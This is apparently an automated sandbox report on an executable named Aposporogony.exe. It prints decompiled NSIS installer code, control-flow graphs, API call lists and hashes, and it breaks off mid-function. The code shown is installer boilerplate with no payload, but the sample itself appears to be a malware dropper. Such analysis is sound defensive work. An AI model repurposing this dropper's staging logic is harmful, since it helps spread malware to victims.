                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                      • String ID: (7B
                                                                                                                                                                                      • API String ID: 3282139019-3251261122
                                                                                                                                                                                      • Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                                                                                                      • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                                                                                                      • Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 295 403ad8-403af0 call 4067c2 298 403af2-403b02 call 40632f 295->298 299 403b04-403b3b call 4062b6 295->299 308 403b5e-403b87 call 403dae call 405dc5 298->308 303 403b53-403b59 lstrcatW 299->303 304 403b3d-403b4e call 4062b6 299->304 303->308 304->303 313 403c19-403c21 call 405dc5 308->313 314 403b8d-403b92 308->314 319 403c23-403c2a call 40640a 313->319 320 403c2f-403c54 LoadImageW 313->320 314->313 315 403b98-403bc0 call 4062b6 314->315 315->313 322 403bc2-403bc6 315->322 319->320 324 403cd5-403cdd call 40140b 320->324 325 403c56-403c86 RegisterClassW 320->325 326 403bd8-403be4 lstrlenW 322->326 327 403bc8-403bd5 call 405cea 322->327 338 403ce7-403cf2 call 403dae 324->338 339 403cdf-403ce2 324->339 328 403da4 325->328 329 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 325->329 333 403be6-403bf4 lstrcmpiW 326->333 334 403c0c-403c14 call 405cbd call 4063e8 326->334 327->326 332 403da6-403dad 328->332 329->324 333->334 337 403bf6-403c00 GetFileAttributesW 333->337 334->313 341 403c02-403c04 337->341 342 403c06-403c07 call 405d09 337->342 348 403cf8-403d12 ShowWindow call 406752 338->348 349 403d7b-403d7c call 405523 338->349 339->332 341->334 341->342 342->334 354 403d14-403d19 call 406752 348->354 355 403d1e-403d30 GetClassInfoW 348->355 352 403d81-403d83 349->352 356 403d85-403d8b 352->356 357 403d9d-403d9f call 40140b 352->357 354->355 360 403d32-403d42 GetClassInfoW RegisterClassW 355->360 361 403d48-403d6b DialogBoxParamW call 40140b 355->361 356->339 362 403d91-403d98 call 40140b 356->362 357->328 360->361 365 403d70-403d79 call 403a28 361->365 362->339 365->332
                                                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                                                      			E00403AD8(void* __eflags) {
                                                                                                                                                                                      				intOrPtr _v4;
                                                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                                                      				int _v12;
                                                                                                                                                                                      				void _v16;
                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                      				intOrPtr* _t22;
                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                      				int _t33;
                                                                                                                                                                                      				void* _t36;
                                                                                                                                                                                      				int _t39;
                                                                                                                                                                                      				int _t40;
                                                                                                                                                                                      				int _t44;
                                                                                                                                                                                      				short _t63;
                                                                                                                                                                                      				WCHAR* _t65;
                                                                                                                                                                                      				signed char _t69;
                                                                                                                                                                                      				WCHAR* _t76;
                                                                                                                                                                                      				intOrPtr _t82;
                                                                                                                                                                                      				WCHAR* _t87;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t82 =  *0x42a254;
                                                                                                                                                                                      				_t22 = E004067C2(2);
                                                                                                                                                                                      				_t90 = _t22;
                                                                                                                                                                                      				if(_t22 == 0) {
                                                                                                                                                                                      					_t76 = 0x423728;
                                                                                                                                                                                      					L"1033" = 0x30;
                                                                                                                                                                                      					 *0x437002 = 0x78;
                                                                                                                                                                                      					 *0x437004 = 0;
                                                                                                                                                                                      					E004062B6(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423728, 0);
                                                                                                                                                                                      					__eflags =  *0x423728;
                                                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                                                      						E004062B6(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083CC, 0x423728, 0);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					lstrcatW(L"1033", _t76);
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					E0040632F(L"1033",  *_t22() & 0x0000ffff);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				E00403DAE(_t78, _t90);
                                                                                                                                                                                      				_t86 = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Ogtiern\\Hamiltonianism";
                                                                                                                                                                                      				 *0x42a2e0 =  *0x42a25c & 0x00000020;
                                                                                                                                                                                      				 *0x42a2fc = 0x10000;
                                                                                                                                                                                      				if(E00405DC5(_t90, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Ogtiern\\Hamiltonianism") != 0) {
                                                                                                                                                                                      					L16:
                                                                                                                                                                                      					if(E00405DC5(_t98, _t86) == 0) {
                                                                                                                                                                                      						E0040640A(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t30 = LoadImageW( *0x42a240, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                                                                                                                      					 *0x429228 = _t30;
                                                                                                                                                                                      					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                                                                                                                                                      						L21:
                                                                                                                                                                                      						if(E0040140B(0) == 0) {
                                                                                                                                                                                      							_t32 = E00403DAE(_t78, __eflags);
                                                                                                                                                                                      							__eflags =  *0x42a300;
                                                                                                                                                                                      							if( *0x42a300 != 0) {
                                                                                                                                                                                      								_t33 = E00405523(_t32, 0);
                                                                                                                                                                                      								__eflags = _t33;
                                                                                                                                                                                      								if(_t33 == 0) {
                                                                                                                                                                                      									E0040140B(1);
                                                                                                                                                                                      									goto L33;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags =  *0x42920c;
                                                                                                                                                                                      								if( *0x42920c == 0) {
                                                                                                                                                                                      									E0040140B(2);
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L22;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							ShowWindow( *0x423708, 5); // executed
                                                                                                                                                                                      							_t39 = E00406752("RichEd20"); // executed
                                                                                                                                                                                      							__eflags = _t39;
                                                                                                                                                                                      							if(_t39 == 0) {
                                                                                                                                                                                      								E00406752("RichEd32");
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t87 = L"RichEdit20W";
                                                                                                                                                                                      							_t40 = GetClassInfoW(0, _t87, 0x4291e0);
                                                                                                                                                                                      							__eflags = _t40;
                                                                                                                                                                                      							if(_t40 == 0) {
                                                                                                                                                                                      								GetClassInfoW(0, L"RichEdit", 0x4291e0);
                                                                                                                                                                                      								 *0x429204 = _t87;
                                                                                                                                                                                      								RegisterClassW(0x4291e0);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t44 = DialogBoxParamW( *0x42a240,  *0x429220 + 0x00000069 & 0x0000ffff, 0, E00403E86, 0); // executed
                                                                                                                                                                                      							E00403A28(E0040140B(5), 1);
                                                                                                                                                                                      							return _t44;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						L22:
                                                                                                                                                                                      						_t36 = 2;
                                                                                                                                                                                      						return _t36;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t78 =  *0x42a240;
                                                                                                                                                                                      						 *0x4291e4 = E00401000;
                                                                                                                                                                                      						 *0x4291f0 =  *0x42a240;
                                                                                                                                                                                      						 *0x4291f4 = _t30;
                                                                                                                                                                                      						 *0x429204 = 0x40a3b4;
                                                                                                                                                                                      						if(RegisterClassW(0x4291e0) == 0) {
                                                                                                                                                                                      							L33:
                                                                                                                                                                                      							__eflags = 0;
                                                                                                                                                                                      							return 0;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                                                                                                                                                      						 *0x423708 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a240, 0);
                                                                                                                                                                                      						goto L21;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t78 =  *(_t82 + 0x48);
                                                                                                                                                                                      					_t92 = _t78;
                                                                                                                                                                                      					if(_t78 == 0) {
                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t76 = 0x4281e0;
                                                                                                                                                                                      					E004062B6(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x4281e0, 0);
                                                                                                                                                                                      					_t63 =  *0x4281e0; // 0x43
                                                                                                                                                                                      					if(_t63 == 0) {
                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if(_t63 == 0x22) {
                                                                                                                                                                                      						_t76 = 0x4281e2;
                                                                                                                                                                                      						 *((short*)(E00405CEA(0x4281e2, 0x22))) = 0;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                                                                                                                                                      					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                                                                                                                                                      						L15:
                                                                                                                                                                                      						E004063E8(_t86, E00405CBD(_t76));
                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t69 = GetFileAttributesW(_t76);
                                                                                                                                                                                      						if(_t69 == 0xffffffff) {
                                                                                                                                                                                      							L14:
                                                                                                                                                                                      							E00405D09(_t76);
                                                                                                                                                                                      							goto L15;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t98 = _t69 & 0x00000010;
                                                                                                                                                                                      						if((_t69 & 0x00000010) != 0) {
                                                                                                                                                                                      							goto L15;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}
























                                                                                                                                                                                      0x00403ade
                                                                                                                                                                                      0x00403ae7
                                                                                                                                                                                      0x00403aee
                                                                                                                                                                                      0x00403af0
                                                                                                                                                                                      0x00403b04
                                                                                                                                                                                      0x00403b16
                                                                                                                                                                                      0x00403b1f
                                                                                                                                                                                      0x00403b28
                                                                                                                                                                                      0x00403b2f
                                                                                                                                                                                      0x00403b34
                                                                                                                                                                                      0x00403b3b
                                                                                                                                                                                      0x00403b4e
                                                                                                                                                                                      0x00403b4e
                                                                                                                                                                                      0x00403b59
                                                                                                                                                                                      0x00403af2
                                                                                                                                                                                      0x00403afd
                                                                                                                                                                                      0x00403afd
                                                                                                                                                                                      0x00403b5e
                                                                                                                                                                                      0x00403b68
                                                                                                                                                                                      0x00403b71
                                                                                                                                                                                      0x00403b76
                                                                                                                                                                                      0x00403b87
                                                                                                                                                                                      0x00403c19
                                                                                                                                                                                      0x00403c21
                                                                                                                                                                                      0x00403c2a
                                                                                                                                                                                      0x00403c2a
                                                                                                                                                                                      0x00403c40
                                                                                                                                                                                      0x00403c46
                                                                                                                                                                                      0x00403c54
                                                                                                                                                                                      0x00403cd5
                                                                                                                                                                                      0x00403cdd
                                                                                                                                                                                      0x00403ce7
                                                                                                                                                                                      0x00403cec
                                                                                                                                                                                      0x00403cf2
                                                                                                                                                                                      0x00403d7c
                                                                                                                                                                                      0x00403d81
                                                                                                                                                                                      0x00403d83
                                                                                                                                                                                      0x00403d9f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403d9f
                                                                                                                                                                                      0x00403d85
                                                                                                                                                                                      0x00403d8b
                                                                                                                                                                                      0x00403d93
                                                                                                                                                                                      0x00403d93
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403d8b
                                                                                                                                                                                      0x00403d00
                                                                                                                                                                                      0x00403d0b
                                                                                                                                                                                      0x00403d10
                                                                                                                                                                                      0x00403d12
                                                                                                                                                                                      0x00403d19
                                                                                                                                                                                      0x00403d19
                                                                                                                                                                                      0x00403d24
                                                                                                                                                                                      0x00403d2c
                                                                                                                                                                                      0x00403d2e
                                                                                                                                                                                      0x00403d30
                                                                                                                                                                                      0x00403d39
                                                                                                                                                                                      0x00403d3c
                                                                                                                                                                                      0x00403d42
                                                                                                                                                                                      0x00403d42
                                                                                                                                                                                      0x00403d61
                                                                                                                                                                                      0x00403d72
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403d77
                                                                                                                                                                                      0x00403cdf
                                                                                                                                                                                      0x00403ce1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403c56
                                                                                                                                                                                      0x00403c56
                                                                                                                                                                                      0x00403c62
                                                                                                                                                                                      0x00403c6c
                                                                                                                                                                                      0x00403c72
                                                                                                                                                                                      0x00403c77
                                                                                                                                                                                      0x00403c86
                                                                                                                                                                                      0x00403da4
                                                                                                                                                                                      0x00403da4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403da4
                                                                                                                                                                                      0x00403c95
                                                                                                                                                                                      0x00403cd0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403cd0
                                                                                                                                                                                      0x00403b8d
                                                                                                                                                                                      0x00403b8d
                                                                                                                                                                                      0x00403b90
                                                                                                                                                                                      0x00403b92
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403ba0
                                                                                                                                                                                      0x00403bb2
                                                                                                                                                                                      0x00403bb7
                                                                                                                                                                                      0x00403bc0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403bc6
                                                                                                                                                                                      0x00403bc8
                                                                                                                                                                                      0x00403bd5
                                                                                                                                                                                      0x00403bd5
                                                                                                                                                                                      0x00403bde
                                                                                                                                                                                      0x00403be4
                                                                                                                                                                                      0x00403c0c
                                                                                                                                                                                      0x00403c14
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403bf6
                                                                                                                                                                                      0x00403bf7
                                                                                                                                                                                      0x00403c00
                                                                                                                                                                                      0x00403c06
                                                                                                                                                                                      0x00403c07
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403c07
                                                                                                                                                                                      0x00403c02
                                                                                                                                                                                      0x00403c04
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403c04
                                                                                                                                                                                      0x00403be4

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                                                                                        • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                                                                                      • lstrcatW.KERNEL32(1033,00423728), ref: 00403B59
                                                                                                                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Ogtiern\Hamiltonianism,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Ogtiern\Hamiltonianism,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
                                                                                                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Ogtiern\Hamiltonianism), ref: 00403C40
                                                                                                                                                                                        • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                                                                                      • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                                                                                                      • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                                                                                                      • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\Aposporogony.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Ogtiern\Hamiltonianism$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                      • API String ID: 1975747703-701265482
                                                                                                                                                                                      • Opcode ID: 4b8f836d1c50267b66867ec41ba414706936f04e84537f349976cd451a4143d2
                                                                                                                                                                                      • Instruction ID: d9d584b045f25ca5441dadad30e0f8e7905dec5efd4dcfd01c713d0f2754c543
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b8f836d1c50267b66867ec41ba414706936f04e84537f349976cd451a4143d2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6761C470204601BBE320AF669E45F2B3A7CEB84749F40447FF945B62E2DB7D9912C62D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 369 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 372 402f80-402f85 369->372 373 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 369->373 374 4031cf-4031d3 372->374 381 4030a8-4030b6 call 402e8e 373->381 382 402fbe-402fd5 373->382 388 403187-40318c 381->388 389 4030bc-4030bf 381->389 384 402fd7 382->384 385 402fd9-402fe6 call 403447 382->385 384->385 393 403143-40314b call 402e8e 385->393 394 402fec-402ff2 385->394 388->374 391 4030c1-4030d9 call 40345d call 403447 389->391 392 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 389->392 391->388 421 4030df-4030e5 391->421 418 403139-40313e 392->418 419 40314d-40317d call 40345d call 4031d6 392->419 393->388 398 403072-403076 394->398 399 402ff4-40300c call 405e99 394->399 402 403078-40307e call 402e8e 398->402 403 40307f-403085 398->403 399->403 414 40300e-403015 399->414 402->403 410 403087-403095 call 4068b5 403->410 411 403098-4030a2 403->411 410->411 411->381 411->382 414->403 420 403017-40301e 414->420 418->374 429 403182-403185 419->429 420->403 422 403020-403027 420->422 421->388 421->392 422->403 424 403029-403030 422->424 424->403 426 403032-403052 424->426 426->388 428 403058-40305c 426->428 430 403064-40306c 428->430 431 40305e-403062 428->431 429->388 432 40318e-40319f 429->432 430->403 433 40306e-403070 430->433 431->381 431->430 434 4031a1 432->434 435 4031a7-4031ac 432->435 433->403 434->435 436 4031ad-4031b3 435->436 436->436 437 4031b5-4031cd call 405e99 436->437 437->374
                                                                                                                                                                                      C-Code - Quality: 99%
                                                                                                                                                                                      			E00402F30(void* __eflags, signed int _a4) {
                                                                                                                                                                                      				long _v8;
                                                                                                                                                                                      				long _v12;
                                                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                                                      				long _v20;
                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                      				signed int _v40;
                                                                                                                                                                                      				short _v560;
                                                                                                                                                                                      				signed int _t54;
                                                                                                                                                                                      				void* _t57;
                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                      				intOrPtr _t65;
                                                                                                                                                                                      				void* _t68;
                                                                                                                                                                                      				intOrPtr* _t70;
                                                                                                                                                                                      				intOrPtr _t71;
                                                                                                                                                                                      				signed int _t77;
                                                                                                                                                                                      				signed int _t82;
                                                                                                                                                                                      				signed int _t83;
                                                                                                                                                                                      				signed int _t89;
                                                                                                                                                                                      				intOrPtr _t92;
                                                                                                                                                                                      				signed int _t101;
                                                                                                                                                                                      				signed int _t103;
                                                                                                                                                                                      				void* _t105;
                                                                                                                                                                                      				signed int _t106;
                                                                                                                                                                                      				signed int _t109;
                                                                                                                                                                                      				void* _t110;
                                                                                                                                                                                      
                                                                                                                                                                                      				_v8 = 0;
                                                                                                                                                                                      				_v12 = 0;
                                                                                                                                                                                      				 *0x42a250 = GetTickCount() + 0x3e8;
                                                                                                                                                                                      				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\Aposporogony.exe", 0x400);
                                                                                                                                                                                      				_t105 = E00405EDE(L"C:\\Users\\Arthur\\Desktop\\Aposporogony.exe", 0x80000000, 3);
                                                                                                                                                                                      				 *0x40a018 = _t105;
                                                                                                                                                                                      				if(_t105 == 0xffffffff) {
                                                                                                                                                                                      					return L"Error launching installer";
                                                                                                                                                                                      				}
                                                                                                                                                                                      				E004063E8(L"C:\\Users\\Arthur\\Desktop", L"C:\\Users\\Arthur\\Desktop\\Aposporogony.exe");
                                                                                                                                                                                      				E004063E8(0x439000, E00405D09(L"C:\\Users\\Arthur\\Desktop"));
                                                                                                                                                                                      				_t54 = GetFileSize(_t105, 0);
                                                                                                                                                                                      				__eflags = _t54;
                                                                                                                                                                                      				 *0x418ee0 = _t54;
                                                                                                                                                                                      				_t109 = _t54;
                                                                                                                                                                                      				if(_t54 <= 0) {
                                                                                                                                                                                      					L22:
                                                                                                                                                                                      					E00402E8E(1);
                                                                                                                                                                                      					__eflags =  *0x42a258;
                                                                                                                                                                                      					if( *0x42a258 == 0) {
                                                                                                                                                                                      						goto L30;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					__eflags = _v12;
                                                                                                                                                                                      					if(_v12 == 0) {
                                                                                                                                                                                      						L26:
                                                                                                                                                                                      						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                                                                                                                                                      						_t110 = _t57;
                                                                                                                                                                                      						E00406923(0x40ce48);
                                                                                                                                                                                      						E00405F0D(0x40ce48,  &_v560, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\"); // executed
                                                                                                                                                                                      						_t62 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                                                                                                                                                                                      						__eflags = _t62 - 0xffffffff;
                                                                                                                                                                                      						 *0x40a01c = _t62;
                                                                                                                                                                                      						if(_t62 != 0xffffffff) {
                                                                                                                                                                                      							_t65 = E0040345D( *0x42a258 + 0x1c);
                                                                                                                                                                                      							 *0x418ee4 = _t65;
                                                                                                                                                                                      							 *0x418ed8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                                                                                                                                                      							_t68 = E004031D6(_v16, 0xffffffff, 0, _t110, _v20); // executed
                                                                                                                                                                                      							__eflags = _t68 - _v20;
                                                                                                                                                                                      							if(_t68 == _v20) {
                                                                                                                                                                                      								__eflags = _v40 & 0x00000001;
                                                                                                                                                                                      								 *0x42a254 = _t110;
                                                                                                                                                                                      								 *0x42a25c =  *_t110;
                                                                                                                                                                                      								if((_v40 & 0x00000001) != 0) {
                                                                                                                                                                                      									 *0x42a260 =  *0x42a260 + 1;
                                                                                                                                                                                      									__eflags =  *0x42a260;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t45 = _t110 + 0x44; // 0x44
                                                                                                                                                                                      								_t70 = _t45;
                                                                                                                                                                                      								_t101 = 8;
                                                                                                                                                                                      								do {
                                                                                                                                                                                      									_t70 = _t70 - 8;
                                                                                                                                                                                      									 *_t70 =  *_t70 + _t110;
                                                                                                                                                                                      									_t101 = _t101 - 1;
                                                                                                                                                                                      									__eflags = _t101;
                                                                                                                                                                                      								} while (_t101 != 0);
                                                                                                                                                                                      								_t71 =  *0x418ed4; // 0x45312
                                                                                                                                                                                      								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
                                                                                                                                                                                      								E00405E99(0x42a280, _t110 + 4, 0x40);
                                                                                                                                                                                      								__eflags = 0;
                                                                                                                                                                                      								return 0;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L30;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						return L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                                                                                                      					}
                                                                                                                                                                                      					E0040345D( *0x418ed0);
                                                                                                                                                                                      					_t77 = E00403447( &_a4, 4);
                                                                                                                                                                                      					__eflags = _t77;
                                                                                                                                                                                      					if(_t77 == 0) {
                                                                                                                                                                                      						goto L30;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					__eflags = _v8 - _a4;
                                                                                                                                                                                      					if(_v8 != _a4) {
                                                                                                                                                                                      						goto L30;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					goto L26;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					do {
                                                                                                                                                                                      						_t106 = _t109;
                                                                                                                                                                                      						asm("sbb eax, eax");
                                                                                                                                                                                      						_t82 = ( ~( *0x42a258) & 0x00007e00) + 0x200;
                                                                                                                                                                                      						__eflags = _t109 - _t82;
                                                                                                                                                                                      						if(_t109 >= _t82) {
                                                                                                                                                                                      							_t106 = _t82;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t83 = E00403447(0x418ee8, _t106);
                                                                                                                                                                                      						__eflags = _t83;
                                                                                                                                                                                      						if(_t83 == 0) {
                                                                                                                                                                                      							E00402E8E(1);
                                                                                                                                                                                      							L30:
                                                                                                                                                                                      							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags =  *0x42a258;
                                                                                                                                                                                      						if( *0x42a258 != 0) {
                                                                                                                                                                                      							__eflags = _a4 & 0x00000002;
